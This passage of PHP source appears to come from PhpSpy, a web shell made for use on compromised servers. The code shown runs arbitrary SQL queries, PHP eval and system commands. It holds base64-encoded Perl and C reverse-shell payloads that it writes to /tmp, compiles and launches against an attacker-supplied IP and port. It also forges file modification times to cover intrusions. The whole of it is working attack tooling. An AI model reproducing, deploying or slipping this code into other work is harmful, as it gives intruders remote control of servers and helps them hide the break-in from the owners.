817 makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
818 $tabledb = array();
819 if ($dbname) {
820 p('<p>');
821 p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
822 if ($tablename) {
823 p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
824 }
825 p('</p>');
826 mysql_select_db($dbname);
827
828 $getnumsql = '';
829 $runquery = 0;
830 if ($sql_query) {
831 $runquery = 1;
832 }
833 $allowedit = 0;
834 if ($tablename && !$sql_query) {
835 $sql_query = "SELECT * FROM $tablename";
836 $getnumsql = $sql_query;
837 $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
838 $allowedit = 1;
839 }
840 p('<form action="'.$self.'" method="POST">');
841 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
842 makehide('tablename', $tablename);
843 makehide('action','sqladmin');
844 p($dbform);
845 p('</form>');
846 if ($tablename || ($runquery && $sql_query)) {
847 if ($doing == 'structure') {
848 $result = q("SHOW COLUMNS FROM $tablename");
849 $rowdb = array();
850 while($row = mysql_fetch_array($result)) {
851 $rowdb[] = $row;
852 }
853 p('<table border="0" cellpadding="3" cellspacing="0">');
854 p('<tr class="head">');
855 p('<td>Field</td>');
856 p('<td>Type</td>');
857 p('<td>Null</td>');
858 p('<td>Key</td>');
859 p('<td>Default</td>');
860 p('<td>Extra</td>');
861 p('</tr>');
862 foreach ($rowdb as $row) {
863 $thisbg = bg();
864 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
865 p('<td>'.$row['Field'].'</td>');
866 p('<td>'.$row['Type'].'</td>');
867 p('<td>'.$row['Null'].' </td>');
868 p('<td>'.$row['Key'].' </td>');
869 p('<td>'.$row['Default'].' </td>');
870 p('<td>'.$row['Extra'].' </td>');
871 p('</tr>');
872 }
873 tbfoot();
874 } elseif ($doing == 'insert' || $doing == 'edit') {
875 $result = q('SHOW COLUMNS FROM '.$tablename);
876 while ($row = mysql_fetch_array($result)) {
877 $rowdb[] = $row;
878 }
879 $rs = array();
880 if ($doing == 'insert') {
881 p('<h2>Insert new line in '.$tablename.' table »</h2>');
882 } else {
883 p('<h2>Update record in '.$tablename.' table »</h2>');
884 $where = base64_decode($base64);
885 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
886 $rs = mysql_fetch_array($result);
887 }
888 p('<form method="post" action="'.$self.'">');
889 p($dbform);
890 makehide('action','sqladmin');
891 makehide('tablename',$tablename);
892 p('<table border="0" cellpadding="3" cellspacing="0">');
893 foreach ($rowdb as $row) {
894 if ($rs[$row['Field']]) {
895 $value = htmlspecialchars($rs[$row['Field']]);
896 } else {
897 $value = '';
898 }
899 $thisbg = bg();
900 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
901 p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
902 }
903 if ($doing == 'insert') {
904 p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
905 } else {
906 p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
907 makehide('base64', $base64);
908 }
909 p('</table></form>');
910 } else {
911 $querys = @explode(';',$sql_query);
912 foreach($querys as $num=>$query) {
913 if ($query) {
914 p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
915 switch(qy($query))
916 {
917 case 0:
918 p('<h2>Error : '.mysql_error().'</h2>');
919 break;
920 case 1:
921 if (strtolower(substr($query,0,13)) == 'select * from') {
922 $allowedit = 1;
923 }
924 if ($getnumsql) {
925 $tatol = mysql_num_rows(q($getnumsql));
926 $multipage = multi($tatol, $pagenum, $page, $tablename);
927 }
928 if (!$tablename) {
929 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
930 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
931 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
932 $tablename = $matches[1][0];
933 }
934 $result = q($query);
935 p($multipage);
936 p('<table border="0" cellpadding="3" cellspacing="0">');
937 p('<tr class="head">');
938 if ($allowedit) p('<td>Action</td>');
939 $fieldnum = @mysql_num_fields($result);
940 for($i=0;$i<$fieldnum;$i++){
941 $name = @mysql_field_name($result, $i);
942 $type = @mysql_field_type($result, $i);
943 $len = @mysql_field_len($result, $i);
944 p("<td nowrap>$name<br><span>$type($len)</span></td>");
945 }
946 p('</tr>');
947 while($mn = @mysql_fetch_assoc($result)){
948 $thisbg = bg();
949 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
950 $where = $tmp = $b1 = '';
951 foreach($mn as $key=>$inside){
952 if ($inside) {
953 $where .= $tmp.$key."='".addslashes($inside)."'";
954 $tmp = ' AND ';
955 }
956 $b1 .= '<td nowrap>'.html_clean($inside).' </td>';
957 }
958 $where = base64_encode($where);
959 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
960 p($b1);
961 p('</tr>');
962 unset($b1);
963 }
964 tbfoot();
965 p($multipage);
966 break;
967 case 2:
968 $ar = mysql_affected_rows();
969 p('<h2>affected rows : <b>'.$ar.'</b></h2>');
970 break;
971 }
972 }
973 }
974 }
975 } else {
976 $query = q("SHOW TABLE STATUS");
977 $table_num = $table_rows = $data_size = 0;
978 $tabledb = array();
979 while($table = mysql_fetch_array($query)) {
980 $data_size = $data_size + $table['Data_length'];
981 $table_rows = $table_rows + $table['Rows'];
982 $table['Data_length'] = sizecount($table['Data_length']);
983 $table_num++;
984 $tabledb[] = $table;
985 }
986 $data_size = sizecount($data_size);
987 unset($table);
988 p('<table border="0" cellpadding="0" cellspacing="0">');
989 p('<form action="'.$self.'" method="POST">');
990 makehide('action','sqladmin');
991 p($dbform);
992 p('<tr class="head">');
993 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
994 p('<td>Name</td>');
995 p('<td>Rows</td>');
996 p('<td>Data_length</td>');
997 p('<td>Create_time</td>');
998 p('<td>Update_time</td>');
999 if ($highver) {
1000 p('<td>Engine</td>');
1001 p('<td>Collation</td>');
1002 }
1003 p('</tr>');
1004 foreach ($tabledb as $key => $table) {
1005 $thisbg = bg();
1006 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1007 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
1008 p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
1009 p('<td>'.$table['Rows'].'</td>');
1010 p('<td>'.$table['Data_length'].'</td>');
1011 p('<td>'.$table['Create_time'].'</td>');
1012 p('<td>'.$table['Update_time'].'</td>');
1013 if ($highver) {
1014 p('<td>'.$table['Engine'].'</td>');
1015 p('<td>'.$table['Collation'].'</td>');
1016 }
1017 p('</tr>');
1018 }
1019 p('<tr class='.bg().'>');
1020 p('<td> </td>');
1021 p('<td>Total tables: '.$table_num.'</td>');
1022 p('<td>'.$table_rows.'</td>');
1023 p('<td>'.$data_size.'</td>');
1024 p('<td colspan="'.($highver ? 4 : 2).'"> </td>');
1025 p('</tr>');
1026
1027 p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
1028 makehide('doing','backupmysql');
1029 formfoot();
1030 p("</table>");
1031 fr($query);
1032 }
1033 }
1034 }
1035 tbfoot();
1036 @mysql_close();
1037}
1038
1039
1040elseif ($action == 'backconnect') {
1041 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1042 !$yourport && $yourport = '12345';
1043 $usedb = array('perl'=>'perl','c'=>'c');
1044
1045 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
1046 "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
1047 "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
1048 "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
1049 "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
1050 "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
1051 "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1052 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
1053 "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
1054 "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
1055 "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
1056 "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
1057 "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
1058 "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
1059 "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1060
1061 if ($start && $yourip && $yourport && $use){
1062 if ($use == 'perl') {
1063 cf('/tmp/angel_bc',$back_connect);
1064 $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
1065 } else {
1066 cf('/tmp/angel_bc.c',$back_connect_c);
1067 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1068 @unlink('/tmp/angel_bc.c');
1069 $res = execute("/tmp/angel_bc $yourip $yourport &");
1070 }
1071 m("Now script try connect to $yourip port $yourport ...");
1072 }
1073
1074 formhead(array('title'=>'Back Connect'));
1075 makehide('action','backconnect');
1076 p('<p>');
1077 p('Your IP:');
1078 makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
1079 p('Your Port:');
1080 makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
1081 p('Use:');
1082 makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
1083 makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
1084 p('</p>');
1085 formfoot();
1086}
1087
1088elseif ($action == 'eval') {
1089 $phpcode = trim($phpcode);
1090 if($phpcode){
1091 if (!preg_match('#<\?#si', $phpcode)) {
1092 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1093 }
1094 eval("?".">$phpcode<?");
1095 }
1096 formhead(array('title'=>'Eval PHP Code'));
1097 makehide('action','eval');
1098 maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
1099 p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
1100 formfooter();
1101}
1102
1103elseif ($action == 'editfile') {
1104 if(file_exists($opfile)) {
1105 $fp=@fopen($opfile,'r');
1106 $contents=@fread($fp, filesize($opfile));
1107 @fclose($fp);
1108 $contents=htmlspecialchars($contents);
1109 }
1110 formhead(array('title'=>'Create / Edit File'));
1111 makehide('action','file');
1112 makehide('dir',$nowpath);
1113 makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
1114 maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
1115 formfooter();
1116}
1117
1118elseif ($action == 'newtime') {
1119 $opfilemtime = @filemtime($opfile);
1120 $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
1121 formhead(array('title'=>'Clone file was last modified time'));
1122 makehide('action','file');
1123 makehide('dir',$nowpath);
1124 makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1125 makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
1126 formfooter();
1127 formhead(array('title'=>'Set last modified'));
1128 makehide('action','file');
1129 makehide('dir',$nowpath);
1130 makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1131 p('<p>Instead »');
1132 p('year:');
1133 makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
1134 p('month:');
1135 makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
1136 p('day:');
1137 makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
1138 p('hour:');
1139 makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
1140 p('minute:');
1141 makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
1142 p('second:');
1143 makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
1144 p('</p>');
1145 formfooter();
1146}
1147
1148elseif ($action == 'shell') {
1149 if (IS_WIN && IS_COM) {
1150 if($program && $parameter) {
1151 $shell= new COM('Shell.Application');
1152 $a = $shell->ShellExecute($program,$parameter);
1153 m('Program run has '.(!$a ? 'success' : 'fail'));
1154 }
1155 !$program && $program = 'c:\windows\system32\cmd.exe';
1156 !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
1157 formhead(array('title'=>'Execute Program'));
1158 makehide('action','shell');
1159 makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
1160 p('<p>');
1161 makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
1162 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1163 p('</p>');
1164 formfoot();
1165 }
1166 formhead(array('title'=>'Execute Command'));
1167 makehide('action','shell');
1168 if (IS_WIN && IS_COM) {
1169 $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
1170 makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
1171 }
1172 p('<p>');
1173 makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
1174 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1175 p('</p>');
1176 formfoot();
1177
1178 if ($command) {
1179 p('<hr width="100%" noshade /><pre>');
1180 if ($execfunc=='wscript' && IS_WIN && IS_COM) {
1181 $wsh = new COM('WScript.shell');
1182 $exec = $wsh->exec('cmd.exe /c '.$command);
1183 $stdout = $exec->StdOut();
1184 $stroutput = $stdout->ReadAll();
1185 echo $stroutput;
1186 } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
1187 $descriptorspec = array(
1188 0 => array('pipe', 'r'),
1189 1 => array('pipe', 'w'),
1190 2 => array('pipe', 'w')
1191 );
1192 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1193 if (is_resource($process)) {
1194 fwrite($pipes[0], $command."\r\n");
1195 fwrite($pipes[0], "exit\r\n");
1196 fclose($pipes[0]);
1197 while (!feof($pipes[1])) {
1198 echo fgets($pipes[1], 1024);
1199 }
1200 fclose($pipes[1]);
1201 while (!feof($pipes[2])) {
1202 echo fgets($pipes[2], 1024);
1203 }
1204 fclose($pipes[2]);
1205 proc_close($process);
1206 }
1207 } else {
1208 echo(execute($command));
1209 }
1210 p('</pre>');
1211 }
1212}
1213
1214elseif ($action == 'phpenv') {
1215 $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1216 $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1217 !$dis_func && $dis_func = 'No';
1218 $info = array(
1219 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
1220 2 => array('Server Domain',$_SERVER['SERVER_NAME']),
1221 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
1222 4 => array('Server OS',PHP_OS),
1223 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
1224 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
1225 7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
1226 8 => array('PHP run mode',strtoupper(php_sapi_name())),
1227 9 => array('The file path',__FILE__),
1228
1229 10 => array('PHP Version',PHP_VERSION),
1230 11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
1231 12 => array('Safe Mode',getcfg('safe_mode')),
1232 13 => array('Administrator',$adminmail),
1233 14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
1234 15 => array('enable_dl',getcfg('enable_dl')),
1235 16 => array('display_errors',getcfg('display_errors')),
1236 17 => array('register_globals',getcfg('register_globals')),
1237 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
1238 19 => array('memory_limit',getcfg('memory_limit')),
1239 20 => array('post_max_size',getcfg('post_max_size')),
1240 21 => array('upload_max_filesize',$upsize),
1241 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
1242 23 => array('disable_functions',$dis_func),
1243 );
1244
1245 if($phpvarname) {
1246 m($phpvarname .' : '.getcfg($phpvarname));
1247 }
1248
1249 formhead(array('title'=>'Server environment'));
1250 makehide('action','phpenv');
1251 makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
1252 formfooter();
1253
1254 $hp = array(0=> 'Server', 1=> 'PHP');
1255 for($a=0;$a<2;$a++) {
1256 p('<h2>'.$hp[$a].' »</h2>');
1257 p('<ul class="info">');
1258 if ($a==0) {
1259 for($i=1;$i<=9;$i++) {
1260 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1261 }
1262 } elseif ($a == 1) {
1263 for($i=10;$i<=23;$i++) {
1264 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1265 }
1266 }
1267 p('</ul>');
1268 }
1269}
1270
1271else {
1272 m('Undefined Action');
1273}
1274
1275?>
1276</td></tr></table>
1277<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
1278 <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
1279 Copyright (C) 2004-2008 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
1280</div>
1281</body>
1282</html>
1283
1284<?php
1285
1286
1287function m($msg) {
1288 echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
1289 echo $msg;
1290 echo '</div>';
1291}
1292function scookie($key, $value, $life = 0, $prefix = 1) {
1293 global $admin, $timestamp, $_SERVER;
1294 $key = ($prefix ? $admin['cookiepre'] : '').$key;
1295 $life = $life ? $life : $admin['cookielife'];
1296 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1297 setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
1298}
1299function multi($num, $perpage, $curpage, $tablename) {
1300 $multipage = '';
1301 if($num > $perpage) {
1302 $page = 10;
1303 $offset = 5;
1304 $pages = @ceil($num / $perpage);
1305 if($page > $pages) {
1306 $from = 1;
1307 $to = $pages;
1308 } else {
1309 $from = $curpage - $offset;
1310 $to = $curpage + $page - $offset - 1;
1311 if($from < 1) {
1312 $to = $curpage + 1 - $from;
1313 $from = 1;
1314 if(($to - $from) < $page && ($to - $from) < $pages) {
1315 $to = $page;
1316 }
1317 } elseif($to > $pages) {
1318 $from = $curpage - $pages + $to;
1319 $to = $pages;
1320 if(($to - $from) < $page && ($to - $from) < $pages) {
1321 $from = $pages - $page + 1;
1322 }
1323 }
1324 }
1325 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
1326 for($i = $from; $i <= $to; $i++) {
1327 $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
1328 }
1329 $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
1330 $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
1331 }
1332 return $multipage;
1333}
1334
1335function loginpage() {
1336?>
1337 <style type="text/css">
1338 input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
1339 </style>
1340 <form method="POST" action="">
1341 <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
1342 <input type="hidden" name="doing" value="login">
1343 <input type="submit" value="Login">
1344 </form>
1345<?php
1346 exit;
1347}
1348
1349function execute($cfe) {
1350 $res = '';
1351 if ($cfe) {
1352 if(function_exists('exec')) {
1353 @exec($cfe,$res);
1354 $res = join("\n",$res);
1355 } elseif(function_exists('shell_exec')) {
1356 $res = @shell_exec($cfe);
1357 } elseif(function_exists('system')) {
1358 @ob_start();
1359 @system($cfe);
1360 $res = @ob_get_contents();
1361 @ob_end_clean();
1362 } elseif(function_exists('passthru')) {
1363 @ob_start();
1364 @passthru($cfe);
1365 $res = @ob_get_contents();
1366 @ob_end_clean();
1367 } elseif(@is_resource($f = @popen($cfe,"r"))) {
1368 $res = '';
1369 while(!@feof($f)) {
1370 $res .= @fread($f,1024);
1371 }
1372 @pclose($f);
1373 }
1374 }
1375 return $res;
1376}
1377function which($pr) {
1378 $path = execute("which $pr");
1379 return ($path ? $path : $pr);
1380}
1381
1382function cf($fname,$text){
1383 if($fp=@fopen($fname,'w')) {
1384 @fputs($fp,@base64_decode($text));
1385 @fclose($fp);
1386 }
1387}
1388
1389
1390function debuginfo() {
1391 global $starttime;
1392 $mtime = explode(' ', microtime());
1393 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1394 echo 'Processed in '.$totaltime.' second(s)';
1395}
1396
1397
1398function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
1399 if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
1400 p('<h2>Can not connect to MySQL server</h2>');
1401 exit;
1402 }
1403 if($link && $dbname) {
1404 if (!@mysql_select_db($dbname, $link)) {
1405 p('<h2>Database selected has error</h2>');
1406 exit;
1407 }
1408 }
1409 if($link && mysql_get_server_info() > '4.1') {
1410 if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
1411 q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1412 }
1413 }
1414 return $link;
1415}
1416
1417function s_array(&$array) {
1418 if (is_array($array)) {
1419 foreach ($array as $k => $v) {
1420 $array[$k] = s_array($v);
1421 }
1422 } else if (is_string($array)) {
1423 $array = stripslashes($array);
1424 }
1425 return $array;
1426}
1427
1428function html_clean($content) {
1429 $content = htmlspecialchars($content);
1430 $content = str_replace("\n", "<br />", $content);
1431 $content = str_replace(" ", " ", $content);
1432 $content = str_replace("\t", " ", $content);
1433 return $content;
1434}
1435
1436function getChmod($filepath){
1437 return substr(base_convert(@fileperms($filepath),10,8),-4);
1438}
1439
1440function getPerms($filepath) {
1441 $mode = @fileperms($filepath);
1442 if (($mode & 0xC000) === 0xC000) {$type = 's';}
1443 elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
1444 elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
1445 elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
1446 elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
1447 elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
1448 elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
1449 else {$type = '?';}
1450
1451 $owner['read'] = ($mode & 00400) ? 'r' : '-';
1452 $owner['write'] = ($mode & 00200) ? 'w' : '-';
1453 $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1454 $group['read'] = ($mode & 00040) ? 'r' : '-';
1455 $group['write'] = ($mode & 00020) ? 'w' : '-';
1456 $group['execute'] = ($mode & 00010) ? 'x' : '-';
1457 $world['read'] = ($mode & 00004) ? 'r' : '-';
1458 $world['write'] = ($mode & 00002) ? 'w' : '-';
1459 $world['execute'] = ($mode & 00001) ? 'x' : '-';
1460
1461 if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
1462 if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
1463 if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
1464
1465 return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
1466}
1467
1468function getUser($filepath) {
1469 if (function_exists('posix_getpwuid')) {
1470 $array = @posix_getpwuid(@fileowner($filepath));
1471 if ($array && is_array($array)) {
1472 return ' / <a href="#" title="User: '.$array['name'].'
Passwd: '.$array['passwd'].'
Uid: '.$array['uid'].'
gid: '.$array['gid'].'
Gecos: '.$array['gecos'].'
Dir: '.$array['dir'].'
Shell: '.$array['shell'].'">'.$array['name'].'</a>';
1473 }
1474 }
1475 return '';
1476}
1477
1478function deltree($deldir) {
1479 $mydir=@dir($deldir);
1480 while($file=$mydir->read()) {
1481 if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
1482 @chmod($deldir.'/'.$file,0777);
1483 deltree($deldir.'/'.$file);
1484 }
1485 if (is_file($deldir.'/'.$file)) {
1486 @chmod($deldir.'/'.$file,0777);
1487 @unlink($deldir.'/'.$file);
1488 }
1489 }
1490 $mydir->close();
1491 @chmod($deldir,0777);
1492 return @rmdir($deldir) ? 1 : 0;
1493}
1494
1495function bg() {
1496 global $bgc;
1497 return ($bgc++%2==0) ? 'alt1' : 'alt2';
1498}
1499
1500function getPath($scriptpath, $nowpath) {
1501 if ($nowpath == '.') {
1502 $nowpath = $scriptpath;
1503 }
1504 $nowpath = str_replace('\\', '/', $nowpath);
1505 $nowpath = str_replace('//', '/', $nowpath);
1506 if (substr($nowpath, -1) != '/') {
1507 $nowpath = $nowpath.'/';
1508 }
1509 return $nowpath;
1510}
1511
